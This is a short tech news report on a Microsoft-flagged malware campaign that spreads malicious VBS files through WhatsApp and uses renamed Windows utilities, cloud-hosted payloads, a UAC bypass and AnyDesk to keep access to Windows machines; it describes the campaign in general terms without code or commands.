Microsoft has flagged a new cyberattack campaign that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files, targeting Windows systems through a multi-stage infection chain.
First observed in late February 2026, the campaign relies heavily on social engineering to trick users into executing the VBS files. Once triggered, the malware creates hidden directories in system paths and deploys renamed versions of legitimate Windows utilities such as curl.exe and bitsadmin.exe, allowing it to blend seamlessly with normal system operations.
The attack progresses by downloading additional payloads from trusted cloud platforms like AWS, Tencent Cloud, and Backblaze B2. These payloads are used to establish persistence and gradually escalate privileges within the infected system.
A key aspect of the campaign is its ability to bypass User Account Control (UAC). The malware repeatedly attempts to execute commands with elevated privileges, modifies registry settings, and weakens system defenses to maintain control. Eventually, it installs malicious MSI packages, including legitimate remote access tools like AnyDesk, enabling continuous access for attackers.
By combining trusted tools, cloud infrastructure, and stealth techniques, this campaign significantly increases its chances of evading detection. It highlights how attackers are evolving their methods to exploit everyday communication platforms and legitimate system utilities to compromise endpoints.
See What’s Next in Tech With the Fast Forward Newsletter
Tweets From @varindiamag
Nothing to see here - yet
When they Tweet, their Tweets will show up here.
